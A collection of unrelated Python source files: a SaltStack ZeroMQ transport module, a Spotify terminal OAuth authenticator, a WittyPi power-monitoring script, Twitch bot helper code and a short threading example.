def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout, raw=raw)
raise tornado.gen.Return(ret)
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
self.io_loop = kwargs.get('io_loop')
if self.io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = tornado.ioloop.IOLoop.current()
self.hexid = hashlib.sha1(six.b(self.opts['id'])).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, b'broadcast')
self._socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, b'')
self._socket.setsockopt(zmq.IDENTITY, salt.utils.stringutils.to_bytes(self.opts['id']))
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if (self.opts['ipv6'] is True or ':' in self.opts['master_ip']) and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def destroy(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
# TODO: Optionally call stream.close() on newer pyzmq? Its broken on some
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
elif hasattr(self, '_socket'):
self._socket.close(0)
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
self.publish_port = self.auth.creds['publish_port']
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
@tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
if messages[0] not in ('broadcast', self.hexid):
log.debug('Publish received for not this minion: {0}'.format(messages[0]))
raise tornado.gen.Return(None)
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
if payload is not None:
callback(payload)
return self.stream.on_recv(wrap_callback)
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._closing = False
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
self.__setup_signals()
salt.utils.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
self.clients.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
# Socket monitor shall be used the only for debug purposes so using threading doesn't look too bad here
import threading
self._monitor = ZeroMQSocketMonitor(self.clients)
t = threading.Thread(target=self._monitor.start_poll)
t.start()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
if self.clients.closed or self.workers.closed:
break
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except (KeyboardInterrupt, SystemExit):
break
def close(self):
'''
Cleanly shutdown the router socket
'''
if self._closing:
return
log.info('MWorkerQueue under PID %s is closing', os.getpid())
self._closing = True
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_w_monitor') and self._w_monitor is not None:
self._w_monitor.stop()
self._w_monitor = None
if hasattr(self, 'clients') and self.clients.closed is False:
self.clients.close()
if hasattr(self, 'workers') and self.workers.closed is False:
self.workers.close()
if hasattr(self, 'stream'):
self.stream.close()
if hasattr(self, '_socket') and self._socket.closed is False:
self._socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
:param func payload_handler: A function to called to handle incoming payloads as
they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
# Socket monitor shall be used the only for debug purposes so using threading doesn't look too bad here
import threading
self._w_monitor = ZeroMQSocketMonitor(self._socket)
t = threading.Thread(target=self._w_monitor.start_poll)
t.start()
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(self.w_uri))
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
Handle incoming messages from underylying TCP streams
:stream ZMQStream stream: A ZeroMQ stream.
See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
:param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as exc:
exc_type = type(exc).__name__
if exc_type == 'AuthenticationError':
log.debug(
'Minion failed to auth to master. Since the payload is '
'encrypted, it is not known which minion failed to '
'authenticate. It is likely that this is a transient '
'failure due to the master rotating its public key.'
)
else:
log.error('Bad load from minion: %s: %s', exc_type, exc)
stream.send(self.serial.dumps('bad load'))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: {0} and load was {1}'.format(payload, payload.get('load')))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun {0}'.format(req_fun))
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise tornado.gen.Return()
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
self.close()
sys.exit(salt.defaults.exitcodes.EX_OK)
def _set_tcp_keepalive(zmq_socket, opts):
'''
Ensure that TCP keepalives are set as specified in "opts".
Warning: Failure to set TCP keepalives on the salt-master can result in
not detecting the loss of a minion when the connection is lost or when
it's host has been terminated without first closing the socket.
Salt's Presence System depends on this connection status to know if a minion
is "present".
Warning: Failure to set TCP keepalives on minions can result in frequent or
unexpected disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and opts:
if 'tcp_keepalive' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE, opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in opts:
zmq_socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, opts['tcp_keepalive_intvl']
)
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(self.opts)
def connect(self):
return tornado.gen.sleep(5)
def _publish_daemon(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
_set_tcp_keepalive(pub_sock, self.opts)
# if 2.1 >= zmq < 3.0, we only have one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_sock.setsockopt(zmq.BACKLOG, self.opts.get('zmq_backlog', 1000))
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on {0}'.format(pull_uri))
old_umask = os.umask(0o177)
try:
pull_sock.bind(pull_uri)
finally:
os.umask(old_umask)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
if six.PY3:
unpacked_package = salt.transport.frame.decode_embedded_strs(unpacked_package)
payload = unpacked_package['payload']
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = hashlib.sha1(topic).hexdigest()
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
# otherwise its a broadcast
else:
# TODO: constants file for "broadcast"
pub_sock.send('broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
else:
pub_sock.send(payload)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon)
def publish(self, load):
'''
Publish "load" to minions
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
# If zmq_filtering is enabled, target matching has to happen master side
match_targets = ["pcre", "glob", "list"]
if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets:
# Fetch a list of minions that match
_res = self.ckminions.check_minions(load['tgt'],
tgt_type=load['tgt_type'])
match_ids = _res['minions']
log.debug("Publish Side Match: {0}".format(match_ids))
# Send list of miions thru so zmq can target them
int_payload['topic_lst'] = match_ids
pub_sock.send(self.serial.dumps(int_payload))
pub_sock.close()
context.term()
class AsyncReqMessageClientPool(salt.transport.MessageClientPool):
'''
Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket.
'''
def __init__(self, opts, args=None, kwargs=None):
super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs)
def __del__(self):
self.destroy()
def destroy(self):
for message_client in self.message_clients:
message_client.destroy()
self.message_clients = []
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
This class wraps the underylying zeromq REQ socket and gives a future-based
interface to sending and recieving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
:param str addr: The interface IP address to bind to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
if io_loop is None:
zmq.eventloop.ioloop.install()
tornado.ioloop.IOLoop.current()
else:
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
# TODO: timeout all in-flight sessions, or error
def destroy(self):
if hasattr(self, 'stream') and self.stream is not None:
# TODO: Optionally call stream.close() on newer pyzmq? It is broken on some.
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.stream = None
self.socket.close()
if self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
_set_tcp_keepalive(self.socket, self.opts)
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
@tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue[0]
future = self.send_future_map.get(message, None)
if future is None:
# Timedout
del self.send_queue[0]
continue
# send
def mark_future(msg):
if not future.done():
data = self.serial.loads(msg[0])
future.set_result(data)
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except: # pylint: disable=W0702
self._init_socket() # re-init the zmq socket (no other way in zmq)
del self.send_queue[0]
continue
del self.send_queue[0]
self.send_future_map.pop(message, None)
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message, None)
if timeout is not None:
# Hasn't been already timedout
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
future = self.send_future_map.pop(message, None)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
del self.send_timeout_map[message]
if future.attempts < future.tries:
future.attempts += 1
log.debug('SaltReqTimeoutError, retrying. ({0}/{1})'.format(future.attempts, future.tries))
self.send(
message,
timeout=future.timeout,
tries=future.tries,
future=future,
)
else:
future.set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False):
'''
Return a future which will be completed when the message has a response
'''
if future is None:
future = tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
# if a future wasn't passed in, we need to serialize the message
message = self.serial.dumps(message)
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if self.opts.get('detect_mode') is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
try:
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
except (AttributeError, zmq.error.ContextTerminated):
# We cannot log here because we'll get an interrupted system call in trying
# to flush the logging buffer as we terminate
pass
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
authentication.py
|
"""
Spotify Terminal authenticates with Spotify by directing
your browser to the locally hosted authentication link.
"""
import json
import os
import requests
import struct
import urllib
import webbrowser
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
import common
logger = common.logging.getLogger(__name__)
class Authenticator(object):
"""Authenticate."""
port = 12345
scope = " ".join([
"playlist-modify-private",
"playlist-modify-public",
"playlist-read-collaborative",
"playlist-read-private",
"user-read-email",
"user-read-currently-playing",
"user-read-playback-state",
"user-read-private",
"user-modify-playback-state",
"user-library-modify",
"user-library-read"
])
def __init__(self, username):
self.username = username
self.token_type = None
self.access_token = None
self.refresh_token = None
self.app_data = []
self._init()
def authenticate(self):
# Try to use local auth file.
if not self._auth_from_file():
def start_server():
http_server = HTTPServer(('localhost', self.port), AuthenticationHandler)
http_server.handle_request()
self.data = http_server.data
logger.debug("Starting auth server")
web_thread = Thread(target=start_server)
web_thread.start()
logger.debug("Opening %s in browser", self._authorize_url())
webbrowser.open_new_tab(self._authorize_url())
logger.debug("Waiting for user to complete authentication process")
web_thread.join()
self._get_tokens()
def refresh(self):
logger.debug("Refreshing token")
post_body = {
"grant_type": "refresh_token",
"refresh_token": self.refresh_token,
"client_id": self.app_data[0],
"client_secret": self.app_data[1]
}
resp = requests.post(self._token_url(), data=post_body)
resp.raise_for_status()
data = json.loads(resp.text)
data["refresh_token"] = self.refresh_token
self._save(data)
def _init(self):
# Full disclosure -- This is easy to decode.
# However, this program does not save any of your
# personal information, so none of your data is compromised.
filename = os.path.join(
os.path.dirname(os.path.abspath(__file__)), ".st"
)
with open(filename, "rb") as f:
line = "".join([
chr(i-1993) for i in struct.unpack("64I", f.readline())
])
self.app_data.append(line[0:32])
self.app_data.append(line[32::])
def _auth_from_file(self):
required_keys = {"access_token",
"token_type",
"refresh_token"}
found_keys = set()
if os.path.isfile(common.get_auth_filename(self.username)):
with open(common.get_auth_filename(self.username)) as auth_file:
for line in auth_file:
line = line.strip()
toks = line.split("=")
if toks[0] in required_keys:
logger.info("Found %s in auth file", toks[0])
setattr(self, toks[0], toks[1])
found_keys.add(toks[0])
return len(required_keys.symmetric_difference(found_keys)) == 0
else:
return False
def _get_tokens(self):
# First request to get tokens.
post_body = {
"grant_type": "authorization_code",
"code": self.data["code"],
"redirect_uri": "http://localhost:{}/".format(self.port),
"client_id": self.app_data[0],
"client_secret": self.app_data[1]
}
resp = requests.post(self._token_url(), data=post_body)
resp.raise_for_status()
data = json.loads(resp.text)
self._save(data)
def _authorize_url(self):
params = {
"client_id": self.app_data[0],
"redirect_uri": "http://localhost:{}/".format(self.port),
"scope": self.scope,
"response_type": "code",
"show_dialog": True
}
return "https://accounts.spotify.com/authorize" + "?" + urllib.urlencode(params)
def _token_url(self):
return "https://accounts.spotify.com/api/token"
def _save(self, data):
if data:
for key, value in data.items():
setattr(self, key, value)
if not os.path.isdir(common.get_app_dir()):
os.mkdir(common.get_app_dir())
with open(common.get_auth_filename(self.username), "w") as auth_file:
for k, v in data.items():
auth_file.write("%s=%s\n" % (k, v))
logger.debug("%s created", common.get_auth_filename(self.username))
else:
try:
os.remove(common.get_auth_filename(self.username))
logger.debug("%s deleted", common.get_auth_filename(self.username))
except OSError:
pass
class AuthenticationHandler(BaseHTTPRequestHandler):
HTML = """
<html>
You may close this tab, and continue jamming in your terminal!
<script type="text/javascript">
window.close();
</script>
</html>
"""
def do_GET(self):
if "code=" in self.path:
self.server.data = self.parse_path(self.path[2::])
self.send_response(200)
self.end_headers()
self.wfile.write(self.HTML)
def parse_path(self, path):
data = {}
items = path.split("&")
for thing in items:
toks = thing.split("=")
data[toks[0]] = toks[1]
return data
def log_message(self, format, *args):
logger.debug(format, *args)
|
wittypi.py
|
import time
import queue
from multiprocessing import Process, Queue, Event
from py_wittypi_device import WittyPiDevice
class VoltageMonitor:
def __init__(self,config):
self.median_values = config['Voltage'].getint('median_values')
self.median_dt = config['Voltage'].getfloat('median_dt')
self.device = WittyPiDevice()
@property
def input_voltage(self):
value = self.device.get_median_input_voltage(
self.median_values,
self.median_dt
)
return value
@property
def output_voltage(self):
value = self.device.get_median_output_voltage(
self.median_values,
self.median_dt
)
return value
class CurrentMonitor:
def __init__(self,config):
self.pause_dt = config['Current'].getfloat('pause_dt')
self.data_queue = Queue()
self.done_event = Event()
self.task = CurrentMonitorTask(config, self.data_queue, self.done_event)
self.process = Process(target=self.task.run,daemon=True)
def start(self):
self.process.start()
time.sleep(self.pause_dt)
def stop(self):
time.sleep(self.pause_dt)
self.done_event.set()
@property
def data(self):
done = False
t_list = []
i_list = []
while not done:
try:
item = self.data_queue.get(False)
t_list.append(item['t'])
i_list.append(item['i'])
except queue.Empty:
done = True
return {'t': t_list, 'i': i_list }
class CurrentMonitorTask:
def __init__(self,config,data_queue,done_event):
self.median_values = config['Current'].getint('median_values')
self.median_dt = config['Current'].getfloat('median_dt')
self.sample_dt = config['Current'].getfloat('sample_dt')
self.data_queue = data_queue
self.done_event = done_event
def run(self):
device = WittyPiDevice()
while not self.done_event.is_set():
current = device.get_median_output_current(
self.median_values,
self.median_dt
)
t = time.time()
data = {'t': t, 'i': current}
self.data_queue.put(data)
time.sleep(self.sample_dt)
# -----------------------------------------------------------------------------
if __name__ == '__main__':
print('hello')
monitor = CurrentMonitor()
monitor.start()
for i in range(10):
print(i)
time.sleep(1.0)
print()
monitor.stop()
curr_data = monitor.data
print(curr_data)
|
common.py
|
# common.py
# Tom Taylor / Version Control
# 2021
from os import environ
from threading import Thread
from playsound import playsound
from twitchio.ext import commands
# CONFIG ------------------------------
bot = commands.Bot(
irc_token=environ['TMI_TOKEN'],
client_id=environ['CLIENT_ID'],
nick=environ['BOT_NICK'],
prefix=environ['BOT_PREFIX'],
initial_channels=[environ['CHANNEL']],
client_secret=environ['CLIENT_SECRET']
)
# GLOBALS ----------------------------
streamer_info = None
# HELPERS ----------------------------
def set_streamer_info(new_streamer_info):
'Should be called as soon as a connection to chat is made. This will get data about the streamer'
global streamer_info
streamer_info = new_streamer_info
def play_sound(sfxpath):
'Play a sound effect'
Thread(target=playsound, args=(sfxpath,), daemon=True).start()
async def does_user_follow_streamer(follower_user_id : int) -> bool:
'Returns true is the user passed by parameter is following the streamer, false if not'
if follower_user_id == int(streamer_info.id):
return True
user_follows_streamer = await bot.get_follow(follower_user_id, streamer_info.id)
return (user_follows_streamer is not None) and ('followed_at' in user_follows_streamer) and (user_follows_streamer['followed_at'] != '')
|
b.py
|
import threading
def thread_job():
print("This is an added Thread, number is %s" % threading.current_thread())
def main():
added_thread = threading.Thread(target=thread_job)
# # 查看进程中还有几个线程在运行
# print(threading.active_count())
# # 返回一个包含正在运行的线程的list
